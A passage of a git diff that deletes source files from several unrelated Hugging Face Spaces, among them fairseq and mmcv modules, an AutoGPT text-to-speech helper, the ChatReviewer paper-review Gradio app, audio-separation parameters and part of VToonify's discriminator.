input_dir, filename + ".out"), "w") as f_in: - label_filename = filename + ".label" if regression else filename + ".out" - with open(os.path.join(data_dir, "label", label_filename), "w") as f_out: - offset = 0 - for i in range(num_examples): - # write example input - ex_len = random.randint(1, maxlen) - ex_str = " ".join(map(chr, input_data[offset : offset + ex_len])) - print(ex_str, file=f_in) - # write example label - if regression: - class_str = " ".join(map(str, output_data[i].numpy())) - print(class_str, file=f_out) - else: - class_str = "class{}".format(output_data[i]) - print(class_str, file=f_out) - offset += ex_len - - os.mkdir(os.path.join(data_dir, input_dir)) - os.mkdir(os.path.join(data_dir, "label")) - _create_dummy_data("train") - _create_dummy_data("valid") - _create_dummy_data("test") - - -def train_masked_lm(data_dir, arch, extra_flags=None): - train_parser = options.get_training_parser() - train_args = options.parse_args_and_arch( - train_parser, - [ - "--task", - "masked_lm", - data_dir, - "--arch", - arch, - "--optimizer", - "adam", - "--lr", - "0.0001", - "--criterion", - "masked_lm", - "--batch-size", - "500", - "--save-dir", - data_dir, - "--max-epoch", - "1", - 
"--no-progress-bar", - "--distributed-world-size", - "1", - "--ddp-backend", - "no_c10d", - "--num-workers", - "0", - ] - + (extra_flags or []), - ) - train.main(train_args) - - -def train_roberta_head(data_dir, arch, num_classes=2, extra_flags=None): - train_parser = options.get_training_parser() - train_args = options.parse_args_and_arch( - train_parser, - [ - "--task", - "sentence_prediction", - data_dir, - "--arch", - arch, - "--encoder-layers", - "2", - "--num-classes", - str(num_classes), - "--optimizer", - "adam", - "--lr", - "0.0001", - "--criterion", - "sentence_prediction", - "--max-tokens", - "500", - "--max-positions", - "500", - "--batch-size", - "500", - "--save-dir", - data_dir, - "--max-epoch", - "1", - "--no-progress-bar", - "--distributed-world-size", - "1", - "--ddp-backend", - "no_c10d", - "--num-workers", - "0", - ] - + (extra_flags or []), - ) - train.main(train_args) - - -def eval_lm_main(data_dir, extra_flags=None): - eval_lm_parser = options.get_eval_lm_parser() - eval_lm_args = options.parse_args_and_arch( - eval_lm_parser, - [ - data_dir, - "--path", - os.path.join(data_dir, "checkpoint_last.pt"), - "--no-progress-bar", - "--num-workers", - "0", - ] - + (extra_flags or []), - ) - eval_lm.main(eval_lm_args) - - -if __name__ == "__main__": - unittest.main() diff --git a/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/data/prepend_dataset.py b/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/data/prepend_dataset.py deleted file mode 100644 index ad74784d2d7920e4a6225282d95543ce16ea50d9..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/data/prepend_dataset.py +++ /dev/null @@ -1,28 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import numpy as np -import torch - -from . 
import BaseWrapperDataset - - -class PrependDataset(BaseWrapperDataset): - def __init__(self, dataset, prepend_getter, ensure_first_token_is=None): - super().__init__(dataset) - self.prepend_getter = prepend_getter - self.ensure_first_token = ensure_first_token_is - - def __getitem__(self, idx): - item = self.dataset[idx] - is_tuple = isinstance(item, tuple) - src = item[0] if is_tuple else item - - assert self.ensure_first_token is None or src[0] == self.ensure_first_token - prepend_idx = self.prepend_getter(self.dataset, idx) - assert isinstance(prepend_idx, int) - src[0] = prepend_idx - item = tuple((src,) + item[1:]) if is_tuple else src - return item diff --git a/spaces/OpenDILabCommunity/LLMRiddlesChatGLMCN/llmriddles/questions/executor.py b/spaces/OpenDILabCommunity/LLMRiddlesChatGLMCN/llmriddles/questions/executor.py deleted file mode 100644 index 61dafa769808626ef0f179fed4f6bf45979e8252..0000000000000000000000000000000000000000 --- a/spaces/OpenDILabCommunity/LLMRiddlesChatGLMCN/llmriddles/questions/executor.py +++ /dev/null @@ -1,35 +0,0 @@ -from typing import Tuple - -from .question import Question -from ..llms import get_llm_fn - - -class QuestionExecutor: - def __init__(self, question: Question, lang: str = 'cn', llm: str = 'chatgpt', llm_cfgs=None): - self.question = question - self.lang = lang - self.llm = llm - self.llm_cfgs = dict(llm_cfgs or {}) - - @property - def question_text(self): - return self.question.texts[self.lang] - - @property - def question_name(self): - return self.question.names[self.lang] - - def check(self, qs_text: str) -> Tuple[str, bool, str]: - answer_text = get_llm_fn(self.llm)(qs_text, **self.llm_cfgs) - correct, explanation = self.check_answer(qs_text, answer_text) - return answer_text, correct, explanation - - def check_answer(self, user_text: str, answer_text: str) -> Tuple[bool, str]: - correct, explanation = self.question.checker(self.question_text, user_text, answer_text, self.lang) - if explanation is None: - if correct: - explanation = 'LLM的回答满足要求' if self.lang == 'cn' else 'Correct Answer From LLM' - else: - explanation = 'LLM的回答不满足要求' if self.lang == 'cn' else 'Wrong Answer From LLM' - - return correct, explanation diff --git a/spaces/PAIR/Text2Video-Zero/annotator/uniformer/mmcv/runner/base_module.py b/spaces/PAIR/Text2Video-Zero/annotator/uniformer/mmcv/runner/base_module.py deleted file mode 100644 index 617fad9bb89f10a9a0911d962dfb3bc8f3a3628c..0000000000000000000000000000000000000000 --- a/spaces/PAIR/Text2Video-Zero/annotator/uniformer/mmcv/runner/base_module.py +++ /dev/null @@ -1,195 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -import copy -import warnings -from abc import ABCMeta -from collections import defaultdict -from logging import FileHandler - -import torch.nn as nn - -from annotator.uniformer.mmcv.runner.dist_utils import master_only -from annotator.uniformer.mmcv.utils.logging import get_logger, logger_initialized, print_log - - -class BaseModule(nn.Module, metaclass=ABCMeta): - """Base module for all modules in openmmlab. - - ``BaseModule`` is a wrapper of ``torch.nn.Module`` with additional - functionality of parameter initialization. Compared with - ``torch.nn.Module``, ``BaseModule`` mainly adds three attributes. - - - ``init_cfg``: the config to control the initialization. - - ``init_weights``: The function of parameter - initialization and recording initialization - information. - - ``_params_init_info``: Used to track the parameter - initialization information. 
This attribute only - exists during executing the ``init_weights``. - - Args: - init_cfg (dict, optional): Initialization config dict. - """ - - def __init__(self, init_cfg=None): - """Initialize BaseModule, inherited from `torch.nn.Module`""" - - # NOTE init_cfg can be defined in different levels, but init_cfg - # in low levels has a higher priority. - - super(BaseModule, self).__init__() - # define default value of init_cfg instead of hard code - # in init_weights() function - self._is_init = False - - self.init_cfg = copy.deepcopy(init_cfg) - - # Backward compatibility in derived classes - # if pretrained is not None: - # warnings.warn('DeprecationWarning: pretrained is a deprecated \ - # key, please consider using init_cfg') - # self.init_cfg = dict(type='Pretrained', checkpoint=pretrained) - - @property - def is_init(self): - return self._is_init - - def init_weights(self): - """Initialize the weights.""" - - is_top_level_module = False - # check if it is top-level module - if not hasattr(self, '_params_init_info'): - # The `_params_init_info` is used to record the initialization - # information of the parameters - # the key should be the obj:`nn.Parameter` of model and the value - # should be a dict containing - # - init_info (str): The string that describes the initialization. - # - tmp_mean_value (FloatTensor): The mean of the parameter, - # which indicates whether the parameter has been modified. - # this attribute would be deleted after all parameters - # is initialized. - self._params_init_info = defaultdict(dict) - is_top_level_module = True - - # Initialize the `_params_init_info`, - # When detecting the `tmp_mean_value` of - # the corresponding parameter is changed, update related - # initialization information - for name, param in self.named_parameters(): - self._params_init_info[param][ - 'init_info'] = f'The value is the same before and ' \ - f'after calling `init_weights` ' \ - f'of {self.__class__.__name__} ' - self._params_init_info[param][ - 'tmp_mean_value'] = param.data.mean() - - # pass `params_init_info` to all submodules - # All submodules share the same `params_init_info`, - # so it will be updated when parameters are - # modified at any level of the model. 
- for sub_module in self.modules(): - sub_module._params_init_info = self._params_init_info - - # Get the initialized logger, if not exist, - # create a logger named `mmcv` - logger_names = list(logger_initialized.keys()) - logger_name = logger_names[0] if logger_names else 'mmcv' - - from ..cnn import initialize - from ..cnn.utils.weight_init import update_init_info - module_name = self.__class__.__name__ - if not self._is_init: - if self.init_cfg: - print_log( - f'initialize {module_name} with init_cfg {self.init_cfg}', - logger=logger_name) - initialize(self, self.init_cfg) - if isinstance(self.init_cfg, dict): - # prevent the parameters of - # the pre-trained model - # from being overwritten by - # the `init_weights` - if self.init_cfg['type'] == 'Pretrained': - return - - for m in self.children(): - if hasattr(m, 'init_weights'): - m.init_weights() - # users may overload the `init_weights` - update_init_info( - m, - init_info=f'Initialized by ' - f'user-defined `init_weights`' - f' in {m.__class__.__name__} ') - - self._is_init = True - else: - warnings.warn(f'init_weights of {self.__class__.__name__} has ' - f'been called more than once.') - - if is_top_level_module: - self._dump_init_info(logger_name) - - for sub_module in self.modules(): - del sub_module._params_init_info - - @master_only - def _dump_init_info(self, logger_name): - """Dump the initialization information to a file named - `initialization.log.json` in workdir. - - Args: - logger_name (str): The name of logger. - """ - - logger = get_logger(logger_name) - - with_file_handler = False - # dump the information to the logger file if there is a `FileHandler` - for handler in logger.handlers: - if isinstance(handler, FileHandler): - handler.stream.write( - 'Name of parameter - Initialization information\n') - for name, param in self.named_parameters(): - handler.stream.write( - f'\n{name} - {param.shape}: ' - f"\n{self._params_init_info[param]['init_info']} \n") - handler.stream.flush() - with_file_handler = True - if not with_file_handler: - for name, param in self.named_parameters(): - print_log( - f'\n{name} - {param.shape}: ' - f"\n{self._params_init_info[param]['init_info']} \n ", - logger=logger_name) - - def __repr__(self): - s = super().__repr__() - if self.init_cfg: - s += f'\ninit_cfg={self.init_cfg}' - return s - - -class Sequential(BaseModule, nn.Sequential): - """Sequential module in openmmlab. - - Args: - init_cfg (dict, optional): Initialization config dict. - """ - - def __init__(self, *args, init_cfg=None): - BaseModule.__init__(self, init_cfg) - nn.Sequential.__init__(self, *args) - - -class ModuleList(BaseModule, nn.ModuleList): - """ModuleList in openmmlab. - - Args: - modules (iterable, optional): an iterable of modules to add. - init_cfg (dict, optional): Initialization config dict. 
- """ - - def __init__(self, modules=None, init_cfg=None): - BaseModule.__init__(self, init_cfg) - nn.ModuleList.__init__(self, modules) diff --git a/spaces/PAIR/Text2Video-Zero/annotator/uniformer/mmseg/models/necks/__init__.py b/spaces/PAIR/Text2Video-Zero/annotator/uniformer/mmseg/models/necks/__init__.py deleted file mode 100644 index 9b9d3d5b3fe80247642d962edd6fb787537d01d6..0000000000000000000000000000000000000000 --- a/spaces/PAIR/Text2Video-Zero/annotator/uniformer/mmseg/models/necks/__init__.py +++ /dev/null @@ -1,4 +0,0 @@ -from .fpn import FPN -from .multilevel_neck import MultiLevelNeck - -__all__ = ['FPN', 'MultiLevelNeck'] diff --git a/spaces/PSLD/PSLD/diffusion-posterior-sampling/bkse/models/losses/dsd_loss.py b/spaces/PSLD/PSLD/diffusion-posterior-sampling/bkse/models/losses/dsd_loss.py deleted file mode 100644 index 9cf4660dc5f3d088bcf926866914ca0790348c5e..0000000000000000000000000000000000000000 --- a/spaces/PSLD/PSLD/diffusion-posterior-sampling/bkse/models/losses/dsd_loss.py +++ /dev/null @@ -1,129 +0,0 @@ -import torch -from models.dsd.bicubic import BicubicDownSample -from models.kernel_encoding.kernel_wizard import KernelWizard -from models.losses.ssim_loss import SSIM - - -class LossBuilder(torch.nn.Module): - def __init__(self, ref_im, opt): - super(LossBuilder, self).__init__() - assert ref_im.shape[2] == ref_im.shape[3] - self.ref_im = ref_im - loss_str = opt["loss_str"] - self.parsed_loss = [loss_term.split("*") for loss_term in loss_str.split("+")] - self.eps = opt["eps"] - - self.ssim = SSIM().cuda() - - self.D = KernelWizard(opt["KernelWizard"]).cuda() - self.D.load_state_dict(torch.load(opt["KernelWizard"]["pretrained"])) - for v in self.D.parameters(): - v.requires_grad = False - - # Takes a list of tensors, flattens them, and concatenates them into a vector - # Used to calculate euclidian distance between lists of tensors - def flatcat(self, l): - l = l if (isinstance(l, list)) else [l] - return torch.cat([x.flatten() for x in l], dim=0) - - def _loss_l2(self, gen_im_lr, ref_im, **kwargs): - return (gen_im_lr - ref_im).pow(2).mean((1, 2, 3)).clamp(min=self.eps).sum() - - def _loss_l1(self, gen_im_lr, ref_im, **kwargs): - return 10 * ((gen_im_lr - ref_im).abs().mean((1, 2, 3)).clamp(min=self.eps).sum()) - - # Uses geodesic distance on sphere to sum pairwise distances of the 18 vectors - def _loss_geocross(self, latent, **kwargs): - pass - - -class LossBuilderStyleGAN(LossBuilder): - def __init__(self, ref_im, opt): - super(LossBuilderStyleGAN, self).__init__(ref_im, opt) - im_size = ref_im.shape[2] - factor = opt["output_size"] // im_size - assert im_size * factor == opt["output_size"] - self.bicub = BicubicDownSample(factor=factor) - - # Uses geodesic distance on sphere to sum pairwise distances of the 18 vectors - def _loss_geocross(self, latent, **kwargs): - if latent.shape[1] == 1: - return 0 - else: - X = latent.view(-1, 1, 18, 512) - Y = latent.view(-1, 18, 1, 512) - A = ((X - Y).pow(2).sum(-1) + 1e-9).sqrt() - B = ((X + Y).pow(2).sum(-1) + 1e-9).sqrt() - D = 2 * torch.atan2(A, B) - D = ((D.pow(2) * 512).mean((1, 2)) / 8.0).sum() - return D - - def forward(self, latent, gen_im, kernel, step): - var_dict = { - "latent": latent, - "gen_im_lr": self.D.adaptKernel(self.bicub(gen_im), kernel), - "ref_im": self.ref_im, - } - loss = 0 - loss_fun_dict = { - "L2": self._loss_l2, - "L1": self._loss_l1, - "GEOCROSS": self._loss_geocross, - } - losses = {} - - for weight, loss_type in self.parsed_loss: - tmp_loss = loss_fun_dict[loss_type](**var_dict) - 
losses[loss_type] = tmp_loss - loss += float(weight) * tmp_loss - loss += 5e-5 * torch.norm(kernel) - losses["Norm"] = torch.norm(kernel) - - return loss, losses - - def get_blur_img(self, sharp_img, kernel): - return self.D.adaptKernel(self.bicub(sharp_img), kernel).cpu().detach().clamp(0, 1) - - -class LossBuilderStyleGAN2(LossBuilder): - def __init__(self, ref_im, opt): - super(LossBuilderStyleGAN2, self).__init__(ref_im, opt) - - # Uses geodesic distance on sphere to sum pairwise distances of the 18 vectors - def _loss_geocross(self, latent, **kwargs): - if latent.shape[1] == 1: - return 0 - else: - X = latent.view(-1, 1, 14, 512) - Y = latent.view(-1, 14, 1, 512) - A = ((X - Y).pow(2).sum(-1) + 1e-9).sqrt() - B = ((X + Y).pow(2).sum(-1) + 1e-9).sqrt() - D = 2 * torch.atan2(A, B) - D = ((D.pow(2) * 512).mean((1, 2)) / 6.0).sum() - return D - - def forward(self, latent, gen_im, kernel, step): - var_dict = { - "latent": latent, - "gen_im_lr": self.D.adaptKernel(gen_im, kernel), - "ref_im": self.ref_im, - } - loss = 0 - loss_fun_dict = { - "L2": self._loss_l2, - "L1": self._loss_l1, - "GEOCROSS": self._loss_geocross, - } - losses = {} - - for weight, loss_type in self.parsed_loss: - tmp_loss = loss_fun_dict[loss_type](**var_dict) - losses[loss_type] = tmp_loss - loss += float(weight) * tmp_loss - loss += 1e-4 * torch.norm(kernel) - losses["Norm"] = torch.norm(kernel) - - return loss, losses - - def get_blur_img(self, sharp_img, kernel): - return self.D.adaptKernel(sharp_img, kernel).cpu().detach().clamp(0, 1) diff --git a/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/guile/2.2/ccache/rnrs/lists.go b/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/guile/2.2/ccache/rnrs/lists.go deleted file mode 100644 index 53c499db4fe5fa929ba045fad76e16e7b0d4058e..0000000000000000000000000000000000000000 Binary files a/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/guile/2.2/ccache/rnrs/lists.go and /dev/null differ diff --git a/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/guile/2.2/ccache/sxml/fold.go b/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/guile/2.2/ccache/sxml/fold.go deleted file mode 100644 index 140b3302098c40c7ac52770487268c6c507410f9..0000000000000000000000000000000000000000 Binary files a/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/guile/2.2/ccache/sxml/fold.go and /dev/null differ diff --git a/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/lilypond/2.24.2/ccache/lily/autochange.go b/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/lilypond/2.24.2/ccache/lily/autochange.go deleted file mode 100644 index 0021ca197157e06caa801783259475d1483f9b4d..0000000000000000000000000000000000000000 Binary files a/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/lilypond/2.24.2/ccache/lily/autochange.go and /dev/null differ diff --git a/spaces/PeepDaSlan9/AutoGPT/BULLETIN.md b/spaces/PeepDaSlan9/AutoGPT/BULLETIN.md deleted file mode 100644 index 735048ddc87a914987c6bd70ccdb231a80242ae3..0000000000000000000000000000000000000000 --- a/spaces/PeepDaSlan9/AutoGPT/BULLETIN.md +++ /dev/null @@ -1,2 +0,0 @@ -Welcome to Auto-GPT! We'll keep you informed of the latest news and features by printing messages here. 
-If you don't wish to see this message, you can run Auto-GPT with the --skip-news flag \ No newline at end of file diff --git a/spaces/PeepDaSlan9/AutoGPT/autogpt/speech/brian.py b/spaces/PeepDaSlan9/AutoGPT/autogpt/speech/brian.py deleted file mode 100644 index 821fdf2f482a9cfa928e5c9680152ad6766d8326..0000000000000000000000000000000000000000 --- a/spaces/PeepDaSlan9/AutoGPT/autogpt/speech/brian.py +++ /dev/null @@ -1,40 +0,0 @@ -""" Brian speech module for autogpt """ -import os - -import requests -from playsound import playsound - -from autogpt.speech.base import VoiceBase - - -class BrianSpeech(VoiceBase): - """Brian speech module for autogpt""" - - def _setup(self) -> None: - """Setup the voices, API key, etc.""" - pass - - def _speech(self, text: str, _: int = 0) -> bool: - """Speak text using Brian with the streamelements API - - Args: - text (str): The text to speak - - Returns: - bool: True if the request was successful, False otherwise - """ - tts_url = ( - f"https://api.streamelements.com/kappa/v2/speech?voice=Brian&text={text}" - ) - response = requests.get(tts_url) - - if response.status_code == 200: - with open("speech.mp3", "wb") as f: - f.write(response.content) - playsound("speech.mp3") - os.remove("speech.mp3") - return True - else: - print("Request failed with status code:", response.status_code) - print("Response content:", response.content) - return False diff --git a/spaces/QuanLingZ/ChatReviewer/app.py b/spaces/QuanLingZ/ChatReviewer/app.py deleted file mode 100644 index 083a1fa40a17e4950c79a5c0934f3d74036eb445..0000000000000000000000000000000000000000 --- a/spaces/QuanLingZ/ChatReviewer/app.py +++ /dev/null @@ -1,218 +0,0 @@ -import numpy as np -import os -import re -import jieba -from io import BytesIO -import datetime -import time -import openai, tenacity -import argparse -import configparser -import json -import tiktoken -import PyPDF2 -import gradio - - -def contains_chinese(text): - for ch in text: - if u'\u4e00' <= ch <= u'\u9fff': - return True - return False - -def insert_sentence(text, sentence, interval): - lines = text.split('\n') - new_lines = [] - - for line in lines: - if contains_chinese(line): - words = list(jieba.cut(line)) - separator = '' - else: - words = line.split() - separator = ' ' - - new_words = [] - count = 0 - - for word in words: - new_words.append(word) - count += 1 - - if count % interval == 0: - new_words.append(sentence) - - new_lines.append(separator.join(new_words)) - - return '\n'.join(new_lines) - -# 定义Reviewer类 -class Reviewer: - # 初始化方法,设置属性 - def __init__(self, api, review_format, paper_pdf, language): - self.api = api - self.review_format = review_format - - self.language = language - self.paper_pdf = paper_pdf - self.max_token_num = 12000 - self.encoding = tiktoken.get_encoding("gpt2") - - - def review_by_chatgpt(self, paper_list): - text = self.extract_chapter(self.paper_pdf) - chat_review_text, total_token_used = self.chat_review(text=text) - return chat_review_text, total_token_used - - - - @tenacity.retry(wait=tenacity.wait_exponential(multiplier=1, min=4, max=10), - stop=tenacity.stop_after_attempt(5), - reraise=True) - def chat_review(self, text): - openai.api_key = self.api # 读取api - review_prompt_token = 1000 - try: - text_token = len(self.encoding.encode(text)) - except: - text_token = 13000 - input_text_index = int(len(text)*(self.max_token_num-review_prompt_token)/(text_token+1)) - input_text = "This is the paper for your review:" + text[:input_text_index] - messages=[ - {"role": "system", "content": "You are a 
professional reviewer. Now I will give you a paper. You need to give a complete review opinion according to the following requirements and format:"+ self.review_format + "Be sure to use {} answers".format(self.language)} , - {"role": "user", "content": input_text + " Translate the output into {}.".format(self.language)}, - ] - try: - response = openai.ChatCompletion.create( - model="gpt-3.5-turbo-16k", - messages=messages, - temperature=0.7 - ) - result = '' - for choice in response.choices: - result += choice.message.content - result = insert_sentence(result, '**Generated by ChatGPT, no copying allowed!**', 50) - result += "\n\n⚠伦理声明/Ethics statement:\n--禁止直接复制生成的评论用于任何论文审稿工作!\n--Direct copying of generated comments for any paper review work is prohibited!" - usage = response.usage.total_tokens - except Exception as e: - # 处理其他的异常 - result = "⚠:非常抱歉>_<,生了一个错误:"+ str(e) - usage = 'xxxxx' - print("********"*10) - print(result) - print("********"*10) - return result, usage - - - - - - def extract_chapter(self, pdf_path): - file_object = BytesIO(pdf_path) - pdf_reader = PyPDF2.PdfReader(file_object) - # 获取PDF的总页数 - num_pages = len(pdf_reader.pages) - # 初始化提取状态和提取文本 - extraction_started = False - extracted_text = "" - # 遍历PDF中的每一页 - for page_number in range(num_pages): - page = pdf_reader.pages[page_number] - page_text = page.extract_text() - - # 开始提取 - extraction_started = True - page_number_start = page_number - # 如果提取已开始,将页面文本添加到提取文本中 - if extraction_started: - extracted_text += page_text - # 停止提取 - if page_number_start + 1 < page_number: - break - return extracted_text - -def main(api, review_format, paper_pdf, language): - start_time = time.time() - comments = '' - output2 = '' - if not api or not review_format or not paper_pdf: - comments = "⚠:API-key或审稿要求或论文pdf未输入!请检测!" - output2 = "⚠:API-key或审稿要求或论文pdf未输入!请检测!" - # 判断PDF文件 - else: - # 创建一个Reader对象 - reviewer1 = Reviewer(api, review_format, paper_pdf, language) - # 开始判断是路径还是文件: - comments, total_token_used = reviewer1.review_by_chatgpt(paper_list=paper_pdf) - time_used = time.time() - start_time - output2 ="使用token数:"+ str(total_token_used)+"\n花费时间:"+ str(round(time_used, 2)) +"秒" - return comments, output2 - - - -######################################################################################################## -# 标题 -title = "🤖ChatReviewer🤖" -# 描述 - -description = '''
    - -ChatReviewer is an intelligent paper analysis and review assistant built on the ChatGPT-3.5 API. Its uses are as follows: - -⭐️Quickly summarize and analyze the strengths and weaknesses of a paper, improving the efficiency with which researchers read and understand the literature and helping them keep up with the research frontier. - -⭐️Analyze your own paper and use the improvement suggestions generated by ChatReviewer to find and fix weaknesses, further raising the quality of your paper. - -If the app feels slow, click Duplicate this Space in the upper right corner to copy ChatReviewer into your own Space! (🈲: Direct copying of the generated comments for any paper review work is prohibited!) - -Star and Fork this project on [Github](https://github.com/nishiwen1214/ChatReviewer); sponsorship to help the project grow quickly is also welcome!💗 - - - -
    -''' - -# 创建Gradio界面 -inp = [gradio.inputs.Textbox(label="请输入你的API-key(sk开头的字符串)", - default="", - type='password'), - gradio.inputs.Textbox(lines=5, - label="请输入特定的分析要求和格式(否则为默认格式)", - default="""* Overall Review -Please briefly summarize the main points and contributions of this paper. -xxx -* Paper Strength -Please provide a list of the strengths of this paper, including but not limited to: innovative and practical methodology, insightful empirical findings or in-depth theoretical analysis, -well-structured review of relevant literature, and any other factors that may make the paper valuable to readers. (Maximum length: 2,000 characters) -(1) xxx -(2) xxx -(3) xxx -* Paper Weakness -Please provide a numbered list of your main concerns regarding this paper (so authors could respond to the concerns individually). -These may include, but are not limited to: inadequate implementation details for reproducing the study, limited evaluation and ablation studies for the proposed method, -correctness of the theoretical analysis or experimental results, lack of comparisons or discussions with widely-known baselines in the field, lack of clarity in exposition, -or any other factors that may impede the reader's understanding or benefit from the paper. Please kindly refrain from providing a general assessment of the paper's novelty without providing detailed explanations. (Maximum length: 2,000 characters) -(1) xxx -(2) xxx -(3) xxx -* Questions To Authors And Suggestions For Rebuttal -Please provide a numbered list of specific and clear questions that pertain to the details of the proposed method, evaluation setting, or additional results that would aid in supporting the authors' claims. -The questions should be formulated in a manner that, after the authors have answered them during the rebuttal, it would enable a more thorough assessment of the paper's quality. (Maximum length: 2,000 characters) -*Overall score (1-10) -The paper is scored on a scale of 1-10, with 10 being the full mark, and 6 stands for borderline accept. Then give the reason for your rating. 
-xxx""" - ), - gradio.inputs.File(label="请上传论文PDF文件(请务必等pdf上传完成后再点击Submit!)",type="bytes"), - gradio.inputs.Radio(choices=["English", "Chinese", "French", "German","Japenese"], - default="English", - label="选择输出语言"), -] - -chat_reviewer_gui = gradio.Interface(fn=main, - inputs=inp, - outputs = [gradio.Textbox(lines=25, label="分析结果"), gradio.Textbox(lines=2, label="资源统计")], - title=title, - description=description) - -# Start server -chat_reviewer_gui .launch(quiet=True, show_api=False) \ No newline at end of file diff --git a/spaces/RMXK/RVC_HFF/infer/lib/uvr5_pack/lib_v5/model_param_init.py b/spaces/RMXK/RVC_HFF/infer/lib/uvr5_pack/lib_v5/model_param_init.py deleted file mode 100644 index b995c0bfb1194746187692e2ab1c2a6dbaaaec6c..0000000000000000000000000000000000000000 --- a/spaces/RMXK/RVC_HFF/infer/lib/uvr5_pack/lib_v5/model_param_init.py +++ /dev/null @@ -1,69 +0,0 @@ -import json -import os -import pathlib - -default_param = {} -default_param["bins"] = 768 -default_param["unstable_bins"] = 9 # training only -default_param["reduction_bins"] = 762 # training only -default_param["sr"] = 44100 -default_param["pre_filter_start"] = 757 -default_param["pre_filter_stop"] = 768 -default_param["band"] = {} - - -default_param["band"][1] = { - "sr": 11025, - "hl": 128, - "n_fft": 960, - "crop_start": 0, - "crop_stop": 245, - "lpf_start": 61, # inference only - "res_type": "polyphase", -} - -default_param["band"][2] = { - "sr": 44100, - "hl": 512, - "n_fft": 1536, - "crop_start": 24, - "crop_stop": 547, - "hpf_start": 81, # inference only - "res_type": "sinc_best", -} - - -def int_keys(d): - r = {} - for k, v in d: - if k.isdigit(): - k = int(k) - r[k] = v - return r - - -class ModelParameters(object): - def __init__(self, config_path=""): - if ".pth" == pathlib.Path(config_path).suffix: - import zipfile - - with zipfile.ZipFile(config_path, "r") as zip: - self.param = json.loads( - zip.read("param.json"), object_pairs_hook=int_keys - ) - elif ".json" == pathlib.Path(config_path).suffix: - with open(config_path, "r") as f: - self.param = json.loads(f.read(), object_pairs_hook=int_keys) - else: - self.param = default_param - - for k in [ - "mid_side", - "mid_side_b", - "mid_side_b2", - "stereo_w", - "stereo_n", - "reverse", - ]: - if not k in self.param: - self.param[k] = False diff --git a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/requests/compat.py b/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/requests/compat.py deleted file mode 100644 index 9ab2bb48656520a95ec9ac87d090f2e741f0e544..0000000000000000000000000000000000000000 --- a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/requests/compat.py +++ /dev/null @@ -1,67 +0,0 @@ -""" -requests.compat -~~~~~~~~~~~~~~~ - -This module previously handled import compatibility issues -between Python 2 and Python 3. It remains for backwards -compatibility until the next major version. -""" - -from pip._vendor import chardet - -import sys - -# ------- -# Pythons -# ------- - -# Syntax sugar. -_ver = sys.version_info - -#: Python 2.x? -is_py2 = _ver[0] == 2 - -#: Python 3.x? -is_py3 = _ver[0] == 3 - -# Note: We've patched out simplejson support in pip because it prevents -# upgrading simplejson on Windows. -import json -from json import JSONDecodeError - -# Keep OrderedDict for backwards compatibility. 
-from collections import OrderedDict -from collections.abc import Callable, Mapping, MutableMapping -from http import cookiejar as cookielib -from http.cookies import Morsel -from io import StringIO - -# -------------- -# Legacy Imports -# -------------- -from urllib.parse import ( - quote, - quote_plus, - unquote, - unquote_plus, - urldefrag, - urlencode, - urljoin, - urlparse, - urlsplit, - urlunparse, -) -from urllib.request import ( - getproxies, - getproxies_environment, - parse_http_list, - proxy_bypass, - proxy_bypass_environment, -) - -builtin_str = str -str = str -bytes = bytes -basestring = (str, bytes) -numeric_types = (int, float) -integer_types = (int,) diff --git a/spaces/Reha2704/VToonify/vtoonify/model/vtoonify.py b/spaces/Reha2704/VToonify/vtoonify/model/vtoonify.py deleted file mode 100644 index 6556a0a6c734be5f413f4683eb63c44f449c6af8..0000000000000000000000000000000000000000 --- a/spaces/Reha2704/VToonify/vtoonify/model/vtoonify.py +++ /dev/null @@ -1,286 +0,0 @@ -import torch -import numpy as np -import math -from torch import nn -from model.stylegan.model import ConvLayer, EqualLinear, Generator, ResBlock -from model.dualstylegan import AdaptiveInstanceNorm, AdaResBlock, DualStyleGAN -import torch.nn.functional as F - -# IC-GAN: stylegan discriminator -class ConditionalDiscriminator(nn.Module): - def __init__(self, size, channel_multiplier=2, blur_kernel=[1, 3, 3, 1], use_condition=False, style_num=None): - super().__init__() - - channels = { - 4: 512, - 8: 512, - 16: 512, - 32: 512, - 64: 256 * channel_multiplier, - 128: 128 * channel_multiplier, - 256: 64 * channel_multiplier, - 512: 32 * channel_multiplier, - 1024: 16 * channel_multiplier, - } - - convs = [ConvLayer(3, channels[size], 1)] - - log_size = int(math.log(size, 2)) - - in_channel = channels[size] - - for i in range(log_size, 2, -1): - out_channel = channels[2 ** (i - 1)] - - convs.append(ResBlock(in_channel, out_channel, blur_kernel)) - - in_channel = out_channel - - self.convs = nn.Sequential(*convs) - - self.stddev_group = 4 - self.stddev_feat = 1 - self.use_condition = use_condition - - if self.use_condition: - self.condition_dim = 128 - # map style degree to 64-dimensional vector - self.label_mapper = nn.Sequential( - nn.Linear(1, 64), - nn.LeakyReLU(negative_slope=0.2, inplace=True), - nn.Linear(64, 64), - nn.LeakyReLU(negative_slope=0.2, inplace=True), - nn.Linear(64, self.condition_dim//2), - ) - # map style code index to 64-dimensional vector - self.style_mapper = nn.Embedding(style_num, self.condition_dim-self.condition_dim//2) - else: - self.condition_dim = 1 - - self.final_conv = ConvLayer(in_channel + 1, channels[4], 3) - self.final_linear = nn.Sequential( - EqualLinear(channels[4] * 4 * 4, channels[4], activation="fused_lrelu"), - EqualLinear(channels[4], self.condition_dim), - ) - - def forward(self, input, degree_label=None, style_ind=None): - out = self.convs(input) - - batch, channel, height, width = out.shape - group = min(batch, self.stddev_group) - stddev = out.view( - group, -1, self.stddev_feat, channel // self.stddev_feat, height, 